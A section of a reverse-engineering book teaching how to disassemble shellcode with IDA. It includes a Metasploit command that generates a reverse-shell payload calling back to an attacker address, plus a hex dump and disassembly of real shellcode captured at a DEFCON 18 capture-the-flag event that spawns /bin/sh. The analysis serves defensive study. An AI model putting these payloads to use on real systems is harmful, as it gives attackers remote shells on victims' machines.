Analyzing Shellcode

Up to this point, this chapter has focused on the use of IDA as an offensive tool. Before we conclude, it is worth offering at least one use for IDA as a defensive tool. As with any other binary code, the only way to determine what shellcode does is to disassemble it. Of course, the first requirement is to get your hands on some shellcode. If you are the curious type and have always wondered how Metasploit payloads work, you might simply use Metasploit to generate a payload in raw form and then disassemble the resulting blob.

The following Metasploit command generates a payload that calls back to port 4444 on the attacker’s computer and grants the attacker a shell on the target Windows computer:

# ./msfpayload windows/shell_reverse_tcp LHOST=192.168.15.20 R > w32_reverse_4444

The resulting file contains the requested payload in its raw binary form. The file can be opened in IDA (in binary form since it has no specific format) and a disassembly obtained by converting the displayed bytes into code.
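A raw payload such as w32_reverse_4444 carries no file header, which is why IDA has to fall back on its binary loader. The Python sketch below illustrates the distinction by checking a file's leading bytes against two well-known magic values (MZ for DOS/PE executables and \x7fELF for ELF files). The function names are hypothetical, and a real loader recognizes many more formats than these two.

```python
# Minimal sketch: classify a file by its leading "magic" bytes.
# ASSUMPTION: only two formats are checked here for illustration; real
# loaders (IDA's included) recognize many more.

MAGICS = {
    b"MZ": "PE/MZ executable",
    b"\x7fELF": "ELF executable",
}


def guess_format(header: bytes) -> str:
    """Return a loader hint for the given leading bytes."""
    for magic, name in MAGICS.items():
        if header.startswith(magic):
            return name
    # No known header: the content must be treated as raw bytes,
    # which is the situation with msfpayload's "R" (raw) output.
    return "raw binary (no recognizable header)"


def guess_file_format(path: str) -> str:
    """Read the first four bytes of a file and classify them."""
    with open(path, "rb") as f:
        return guess_format(f.read(4))


if __name__ == "__main__":
    import sys

    for p in sys.argv[1:]:
        print(f"{p}: {guess_file_format(p)}")
```

Pointed at the w32_reverse_4444 file, a raw payload would be expected to fall through to the "raw binary" case, since shellcode has no reason to begin with either magic value.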

Another place that shellcode can turn up is in network packet captures. Narrowing down exactly which packets contain shellcode can be a challenge, and you are invited to check out any of the vast number of books on network security that will be happy to tell you just how to find all those nasty packets. For now, consider the reassembled client stream of an attack observed on the Capture the Flag network at DEFCON 18:

00000000   AD 02 0E 08  01 00 00 00  47 43 4E 93  43 4B 91 90  ........GCN.CK..
00000010   92 47 4E 46  96 46 41 4A  43 4F 99 41  40 49 48 43  .GNF.FAJCO.A@IHC
00000020   4A 4E 4B 43  42 49 93 4B  4A 41 47 46  46 46 43 90  JNKCBI.KJAGFFFC.
00000030   4E 46 97 4A  43 90 42 91  46 90 4E 97  42 48 41 48  NF.JC.B.F.N.BHAH
00000040   97 93 48 97  93 42 40 4B  99 4A 6A 02  58 CD 80 09  ..H..B@K.Jj.X...
00000050   D2 75 06 6A  01 58 50 CD  80 33 C0 B4  10 2B E0 31  .u.j.XP..3...+.1
00000060   D2 52 89 E6  52 52 B2 80  52 B2 04 52  56 52 52 66  .R..RR..R..RVRRf
00000070   FF 46 E8 6A  1D 58 CD 80  81 3E 48 41  43 4B 75 EF  .F.j.X...>HACKu.
00000080   5A 5F 6A 02  59 6A 5A 58  99 51 57 51  CD 80 49 79  Z_j.YjZX.QWQ..Iy
00000090   F4 52 68 2F  2F 73 68 68  2F 62 69 6E  89 E3 50 54  .Rh//shh/bin..PT
000000A0   53 53 B0 3B  CD 80 41 41  49 47 41 93  97 97 4B 48  SS.;..AAIGA...KH

This dump clearly contains a mix of ASCII and binary data, and based on other data associated with this particular network connection, the binary data is assumed to be shellcode. Packet-analysis tools such as Wireshark^[199] can often extract TCP session content directly to a file. In the case of Wireshark, once you find a TCP session of interest, you can use the Follow TCP Stream command and then save the raw stream content to a file. The resulting file can then be loaded into IDA (using IDA's binary loader) and analyzed further.

Network attack sessions often contain a mix of shellcode and application-layer content. In order to properly disassemble the shellcode, you must correctly locate the first bytes of the attacker's payload. The difficulty of doing this varies from one attack to the next and from one protocol to the next. In some cases, long NOP slides will be obvious (long sequences of 0x90 for x86 attacks), while in other cases (such as the current example), locating the NOPs, and therefore the shellcode, may be less obvious. The preceding hex dump, for example, does contain a NOP slide; however, instead of actual x86 NOPs, it uses a randomly generated sequence of 1-byte instructions that have no effect on the shellcode that follows. Because the number of possible permutations of such a slide is enormous, the chance that a network intrusion detection system will recognize and alert on it is reduced. Finally, some knowledge of the application being attacked may help in distinguishing data elements meant for consumption by the application from shellcode meant to be executed. In this case, with a little effort, IDA disassembles the preceding binary content as shown here:

   seg000:00000000           db 0ADh ; ¡
   seg000:00000001           db    2
   seg000:00000002           db  0Eh
   seg000:00000003           db    8
   seg000:00000004           db    1
   seg000:00000005           db    0
   seg000:00000006           db    0
   seg000:00000007           db    0
   seg000:00000008 ; --------------------------------------------------------------
   seg000:00000008           inc     edi
   seg000:00000009           inc     ebx
   seg000:0000000A           dec     esi
   ...             ; NOP slide and shellcode initialization omitted
   seg000:0000006D           push    edx
   seg000:0000006E           push    edx
   seg000:0000006F
   seg000:0000006F loc_6F:                   ; CODE XREF:  seg000:0000007E↓j
   seg000:0000006F           inc     word ptr [esi-18h]
   seg000:00000073           push    1Dh
   seg000:00000075           pop     eax
   seg000:00000076           int     80h     ; LINUX - sys_pause
   seg000:00000078           cmp     dword ptr [esi], 4B434148h
   seg000:0000007E           jnz     short loc_6F
   seg000:00000080           pop     edx
   seg000:00000081           pop     edi
   seg000:00000082           push    2
   seg000:00000084           pop     ecx
   seg000:00000085
   seg000:00000085 loc_85:                   ; CODE XREF:  seg000:0000008F↓j
   seg000:00000085           push    5Ah ; 'Z'
   seg000:00000087           pop     eax
   seg000:00000088           cdq
   seg000:00000089           push    ecx
   seg000:0000008A           push    edi
   seg000:0000008B           push    ecx
   seg000:0000008C           int     80h     ; LINUX - old_mmap
   seg000:0000008E           dec     ecx
   seg000:0000008F           jns     short loc_85
   seg000:00000091           push    edx
   seg000:00000092           push    'hs//'
   seg000:00000097           push    'nib/'
   ...             ; continues to invoke execve to spawn the shell
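The listing above elides the NOP slide, but locating where such a slide ends can be partly automated. The Python sketch below is an illustration, not a detection rule: it scans the reassembled stream from the hex dump for the longest run of bytes drawn from a candidate set of 1-byte x86 instructions. That set is an assumption built from the bytes that actually appear in this dump: inc and dec of eax, ecx, edx, ebx, esi, and edi; nop; xchg of eax with ecx, edx, ebx, esi, or edi; and cdq. The esp and ebp forms (44h, 45h, 4Ch, 4Dh, 94h, 95h) never occur in this slide, presumably because altering those registers could disturb the payload. Other sled generators may use other opcodes, and ordinary traffic can contain short runs of these bytes by chance.

```python
# Sketch: find the longest run of "NOP-equivalent" 1-byte x86 instructions.
# ASSUMPTION: the candidate set mirrors the bytes seen in the DEFCON 18 dump;
# it is not an exhaustive list of sled opcodes.
SLED_BYTES = frozenset(
    [0x40, 0x41, 0x42, 0x43, 0x46, 0x47]    # inc eax/ecx/edx/ebx/esi/edi
    + [0x48, 0x49, 0x4A, 0x4B, 0x4E, 0x4F]  # dec eax/ecx/edx/ebx/esi/edi
    + [0x90]                                # nop
    + [0x91, 0x92, 0x93, 0x96, 0x97]        # xchg eax, ecx/edx/ebx/esi/edi
    + [0x99]                                # cdq
)

# The reassembled client stream from the hex dump (176 bytes).
STREAM = bytes.fromhex(
    "AD 02 0E 08 01 00 00 00 47 43 4E 93 43 4B 91 90 "
    "92 47 4E 46 96 46 41 4A 43 4F 99 41 40 49 48 43 "
    "4A 4E 4B 43 42 49 93 4B 4A 41 47 46 46 46 43 90 "
    "4E 46 97 4A 43 90 42 91 46 90 4E 97 42 48 41 48 "
    "97 93 48 97 93 42 40 4B 99 4A 6A 02 58 CD 80 09 "
    "D2 75 06 6A 01 58 50 CD 80 33 C0 B4 10 2B E0 31 "
    "D2 52 89 E6 52 52 B2 80 52 B2 04 52 56 52 52 66 "
    "FF 46 E8 6A 1D 58 CD 80 81 3E 48 41 43 4B 75 EF "
    "5A 5F 6A 02 59 6A 5A 58 99 51 57 51 CD 80 49 79 "
    "F4 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 50 54 "
    "53 53 B0 3B CD 80 41 41 49 47 41 93 97 97 4B 48 "
)


def find_sled(data: bytes, min_len: int = 16):
    """Return (start, end) offsets of the longest sled-like run, or None.

    `end` is exclusive, so data[end] is the first byte after the run.
    Runs shorter than `min_len` bytes are ignored.
    """
    best = None
    run_start = None
    # A trailing 0x00 (not a sled byte) closes any run that reaches the end.
    for i, b in enumerate(data + b"\x00"):
        if b in SLED_BYTES:
            if run_start is None:
                run_start = i
        elif run_start is not None:
            length = i - run_start
            if length >= min_len and (best is None or length > best[1] - best[0]):
                best = (run_start, i)
            run_start = None
    return best


if __name__ == "__main__":
    start, end = find_sled(STREAM)
    print(f"sled: {start:#04x}..{end:#04x}, first payload byte {STREAM[end]:#04x}")
```

Run against the dump, the sketch reports a 66-byte run starting at offset 08h and ending just before 4Ah, where the bytes 6A 02 (push 2) begin. This agrees with the observation that the first 8 bytes are not part of the payload.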

One point worth noting is that the first 8 bytes of the stream are actually protocol data, not shellcode, and thus we have chosen not to disassemble them. Also, IDA appears to have misidentified the system calls made at seg000:00000076 and seg000:0000008C. We have not yet mentioned that this exploit was targeting a FreeBSD application, a fact that would be helpful in decoding the system call numbers used in the payload. Because IDA is only capable of annotating Linux system call numbers, we are left to do a little research to learn that FreeBSD system call 29 (1Dh) is actually recvfrom (rather than pause) and system call 90 (5Ah) is actually dup2 (rather than old_mmap).
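Because the same value in eax names different system calls on different operating systems, it can help to list every int 80h in a payload together with the value loaded into eax just before it. The Python sketch below does this with a crude byte-pattern heuristic rather than a real disassembler: for each CD 80 (int 80h), it looks back a few bytes for 6A xx 58 (push imm8 / pop eax) or B0 xx (mov al, imm8). The pattern rules, the window size, and the function name are assumptions that happen to fit this payload, and the lookup tables hold only the two numbers discussed here; they are not complete system call tables.

```python
# Sketch: pair each int 80h with the immediate most recently moved into eax.
# HEURISTIC (an assumption): only "push imm8 / pop eax" (6A xx 58) and
# "mov al, imm8" (B0 xx, which assumes the rest of eax is already zero) are
# recognized, within `window` bytes before the CD 80.
LINUX_I386 = {29: "pause", 90: "old_mmap"}   # what IDA's comments suggest
FREEBSD_I386 = {29: "recvfrom", 90: "dup2"}  # what the FreeBSD target runs

# Bytes of seg000:0000006D through seg000:0000008D from the listing.
LISTED = bytes.fromhex(
    "52 52 66 FF 46 E8 6A 1D 58 CD 80 81 3E 48 41 43 "
    "4B 75 EF 5A 5F 6A 02 59 6A 5A 58 99 51 57 51 CD 80"
)


def find_syscalls(code: bytes, base: int = 0, window: int = 8):
    """Yield (address of int 80h, syscall number) pairs."""
    for i in range(len(code) - 1):
        if code[i] != 0xCD or code[i + 1] != 0x80:
            continue
        # Walk backward, nearest candidate first, from two bytes before CD 80.
        for j in range(i - 2, max(i - window, 0) - 1, -1):
            if code[j] == 0xB0:  # mov al, imm8
                yield base + i, code[j + 1]
                break
            if j + 2 < i and code[j] == 0x6A and code[j + 2] == 0x58:
                yield base + i, code[j + 1]  # push imm8 / pop eax
                break


if __name__ == "__main__":
    for addr, num in find_syscalls(LISTED, base=0x6D):
        print(f"{addr:08X}: eax={num} ({num:#x}) "
              f"Linux {LINUX_I386.get(num, '?')}, FreeBSD {FREEBSD_I386.get(num, '?')}")
```

On the listed bytes, the sketch pairs 00000076 with 29 (0x1d) and 0000008C with 90 (0x5a), printing the Linux and FreeBSD names side by side. A byte-pattern scan like this can easily be fooled by bytes that belong to other instructions, so its output is a hint to verify in the disassembly, not a substitute for it.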

Because it lacks any header information useful to IDA, shellcode will generally require extra attention in order to be properly disassembled. In addition, shellcode encoders are frequently employed as a means of evading intrusion detection systems. Such encoders affect shellcode much as obfuscation tools affect standard binaries, further complicating the shellcode-disassembly process.
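To see why encoding complicates analysis, consider the simplest possible scheme, a single-byte XOR. This is a toy chosen for illustration, not a description of any particular Metasploit encoder; production encoders typically prepend a self-decoding stub and use more elaborate keying. The Python sketch encodes the push '//sh' / push '/bin' instruction bytes from the dump, shows that the /bin string no longer appears, and then recovers the key by brute force from a known plaintext fragment. The helper names and the key 0xAA are hypothetical.

```python
# Toy single-byte XOR encoder/decoder plus a known-plaintext key search.
# ASSUMPTION: illustrative only; real shellcode encoders are more elaborate.


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with `key`; applying it twice restores the input."""
    return bytes(b ^ key for b in data)


def find_xor_keys(encoded: bytes, known: bytes) -> list[int]:
    """Return every single-byte key under which `known` appears after decoding."""
    return [k for k in range(256) if known in xor_bytes(encoded, k)]


# push '//sh' ; push '/bin'  (bytes 68 2F 2F 73 68 68 2F 62 69 6E from the dump)
PLAIN = bytes.fromhex("68 2F 2F 73 68 68 2F 62 69 6E")

if __name__ == "__main__":
    encoded = xor_bytes(PLAIN, 0xAA)  # 0xAA is an arbitrary example key
    print(b"/bin" in encoded)         # False: the telltale string is hidden
    print([hex(k) for k in find_xor_keys(encoded, b"/bin")])  # ['0xaa']
```

Until such a payload is decoded, disassembling the encoded bytes yields meaningless instructions, which is why an analyst usually has to identify and emulate (or reimplement) the decoder before the real shellcode can be examined.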

^[199]See http://www.wireshark.org/.

Table of Contents for The IDA Pro Book, 2nd Edition
